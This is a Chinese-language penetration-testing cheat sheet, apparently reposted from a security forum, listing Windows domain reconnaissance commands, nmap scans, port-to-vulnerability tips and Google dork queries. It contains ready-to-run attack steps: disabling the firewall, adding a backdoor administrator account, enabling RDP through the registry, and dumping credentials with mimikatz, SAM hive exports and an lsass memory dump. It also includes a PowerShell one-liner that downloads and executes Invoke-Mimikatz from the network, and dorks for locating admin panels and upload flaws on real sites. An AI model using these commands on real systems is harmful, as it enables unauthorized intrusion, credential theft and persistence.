纯萌新,刚接触不到一个月 – 作者:24kBACK

将自己用到的命令你个分享出来,希望大家给补充一下图片[1]-纯萌新,刚接触不到一个月 – 作者:24kBACK-安全小百科

———————————————————————————————————————————————————-
域常用操作命令:
ipconfig /all                —— 查询本机IP段,所在域等 
net user                     —— 本机用户列表 
net localhroup administrators       —— 本机管理员[通常含有域用户] 
net user /domain                        —— 查询域用户 
net group /domain                      —— 查询域里面的工作组
net group “domain admins” /domain       —— 查询域管理员用户组 
net localgroup administrators /domain    —— 登录本机的域管理员
net localgroup administrators workgroup\user001 /add   ——域用户添加到本机
net group “domain controllers” /domain                         —— 查看域控制器(如果有多台) 
net time /domain          —— 判断主域,主域服务器都做时间服务器 
net config workstation   —— 当前登录域 
net session                  —— 查看当前会话 
net use \\ip\ipc$ pawword /user:username      —— 建立IPC会话[空连接-***] 
net share                    ——  查看SMB指向的路径[即共享]
net view                      —— 查询同一域内机器列表 
net view \\ip                —— 查询某IP共享
net view /domain                           —— 查询域列表
net view /domain:domainname        —— 查看workgroup域中计算机列表 
net start                                         —— 查看当前运行的服务 
net accounts                                   ——  查看本地密码策略 
net accounts /domain                      ——  查看域密码策略 
nbtstat –A ip                                   ——netbios 查询 
netstat –an/ano/anb                        —— 网络连接查询 
route print                                      —— 路由表
tasklist /V                                                      —– 查看进程[显示对应用户]
tasklist /S ip /U domain\username /P /V             —– 查看远程计算机进程列表
qprocess *                                                    —– 类似tasklist
qprocess /SERVER:IP                                      —– 远程查看计算机进程列表
nslookup –qt-MX Yahoo.com                           —– 查看邮件服务器
whoami /all                                                   —– 查询当前用户权限等
set                                                              —– 查看系统环境变量
systeminfo                                                    —– 查看系统信息
qwinsta                                                        —– 查看登录情况
qwinsta /SERVER:IP                                       —– 查看远程登录情况
fsutil fsinfo drives                                           —– 查看所有盘符
gpupdate /force                                            —– 更新域策略
wmic bios                                                     —– 查看bios信息
wmic qfe                                                      —– 查看补丁信息
wmic qfe get hotfixid                                     —– 查看补丁-Patch号
wmic startup                                                 —– 查看启动项
wmic service                                                 —– 查看服务
wmic os                                                       —– 查看OS信息
———————————————————————————————————————————————————-
window命令集
net user  查看用户列表
quser   查看用户登录情况
tasklist /svc 查看系统进程
logoff uid   注销账号(配合quser)
netstat -ano 查看端口开放及访问情况
net localgroup administrators 查看名为administrators的工作组
netsh firewall set opmode mode=disable 关闭防火墙
net user admin 123456 /add  添加一个名为admin 密码为123456的账号
net localgroup administrators admin /add 将用户admin添加到管理员组
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
命令开启3389

>覆盖 >>追加
———————————————————————————————————————————————————-
nmap localhost          #查看主机当前开放的端口
nmap -p 1024-65535 localhost       #查看主机端口(1024-65535)中开放的端口
nmap -PS 192.168.21.163            #探测目标主机开放的端口
nmap -PS22,80,3306  192.168.21.163       #探测所列出的目标主机端口
nmap -O 192.168.21.163        #探测目标主机操作系统类型
nmap -A 192.168.21.163        #探测目标主机操作系统类型
nmap –help         #更多nmap参数请查询帮助信息
———————————————————————————————————————————————————————
抓登陆明文密码工具
方法一
mimikatz # privilege::debug 
mimikatz # sekurlsa::logonpasswords
mimikatz.exe “privilege::debug” “sekurlsa::logonpasswords” “exit” >> password.txt 
方法二
powershell “IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1’); Invoke-Mimikatz -DumpCreds”
方法三
reg save hklm\sam sam.hive
reg save hklm\system system.hive 导hash
lsadump::sam /sam:sam.hive /system:system.hive mimikatz  //解析hiv
SAMInside.exe  //可解密hive

方法四
Procdump64.exe -accepteula -ma lsass.exe lsass.dmp  //导出lsadump
mimikatz # sekurlsa::minidump lsass.dmp
mimikatz # sekurlsa::logonPasswords full
mimikatz.exe “sekurlsa::minidump lsass.dmp” “sekurlsa::logonPasswords full” > mima.txt
———————————————————————————————————————————————————-
常用端口对应漏洞

端口   服务          说明
21    FTP         主要看是否支持匿名,也可跑弱口令
22    SSH        弱口令爆破
23    telnet        弱口令爆破
80-90   WEB         常见WEB漏洞以及一些为管理后台
161    snmp        public弱口令
389    ldap         是否为匿名访问
443    openssl        heart出血以及一些WEB漏洞测试
445    smb         跑弱口令,检测是否有ms_08067等溢出
873    rsync         是否为匿名访问,也可以跑弱口令
1025    RPC         NFS匿名访问
1099    java rmi       远程命令执行漏洞
1433    mssql         弱口令爆破
1521    oracle         弱口令爆破
2082/2083  cpanel主机管理系统登陆    弱口令爆破
2222        DA虚拟主机管理系统登陆    弱口令爆破
2601,2604  zebra路由器      默认密码zebra
3128      squid代理默认端口     如果没设置口令很可能就直接漫游内网
3306       mysql         弱口令爆破
3312/3311  kangle主机管理系统登陆  说明
3389   RDP         弱口令爆破,SHIFT后门,放大镜,输入法漏洞
4440       rundeck        web
4848    GlassFish web中间件    弱口令admin/adminadmin
5432    postgres        弱口令爆破
5560,7778  iSqlPlus  
5900,5901,5902  vnc        弱口令爆破
5984   CouchDB        http://xxx:5984/_utils/
6082    varnish  
6379    redis         一般无验证,直接访问
7001,7002   weblogic        弱口令爆破
7778    Kloxo        主机控制面板登录
8080    tomcat\jboss      弱口令爆破,jboss后台可能不验证
8649    ganglia  
8080-8090   常见WEB端口  
8083    Vestacp主机管理系统 (国外用较多)  
8649    ganglia  
8888    amh/LuManager       主机管理系统默认端口 说明
9000    fcgi         fcgi php命令执行漏洞
9200    elasticsearch       代码执行
9043    websphere        弱口令爆破
10000    Virtualmin/Webmin     服务器虚拟主机管理系统
11211    memcache        内存泄露
27017     mongodb        未授权访问
28017    mongodb        未授权访问
50000    Upnp         SAP命令执行
50060  hadoop        WEB 未授权访问
50030    hadoop        WEB 未授权访问
常见端口列表整理如下:

21,22,23,80-90,161,389,443,445,873,1099,1433,1521,1900,2082,2083,2222,2601,2604,3128,3306,3311,3312,3389,4440,4848,5432,
5560,5900,5901,5902,6082,6379,7001-7010,7778,8080-8090,8649,8888,9000,9200,10000,11211,27017,28017,50000,50030,50060

———————————————————————————————————————————————————-
谷歌黑客

inurl:用于搜索网页上包含的URL,这个语法对寻找网页上的搜索,帮助之类的很有用

intext: 只搜索网页部分中包含的文字(也就是忽略了标题、URL等的文字)

filetype:搜索文件的后缀或者扩展名

intitle:限制你搜索的网页标题

link: 可以得到一个所有包含了某个指定URL的页面列表

info:查找指定站点的一些基本信息

cache:搜索Google里关于某些内容的缓存

查找后台地址:site:域名 inurl:login|admin|manage|member|admin_login|login_admin|system|login|user|main|cms

查找文本内容:site:域名 intext:管理|后台|登陆|用户名|密码|验证码|系统|帐号|admin|login|sys|managetem|password|username

查找可注入点:site:域名 inurl:aspx|jsp|php|asp 

查找上传漏洞:site:域名 inurl:file|load|editor|Files找eweb

编辑器:site:域名 inurl:ewebeditor|editor|uploadfile|eweb|edit

存在的数据库:site:域名 filetype:mdb|asp|#

查看脚本类型:site:域名 filetype:asp/aspx/php/jsp

迂回策略入侵:inurl:cms/data/templates/images/index/

列:尝试搜索一些学校网站的后台,语法为:”site:http://edu.cn intext: 后台管理”

意思为搜索网页正文中包含有“后台管理” 并且域名后缀是http://edu.cn的网站,

利用Goole搜索,我们可以很轻松地得到想要的信息,还可以用它来收集数据库文件、SQL注入、配置信息、源代码泄露、未授权访问和robots.txt等敏感信息。

注:Google搜索的思路同样可以用在百度、雅虎、Bing、Shodan等搜索引擎上,语法大同小异。

来源:freebuf.com 2020-08-10 15:57:20 by: 24kBACK

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论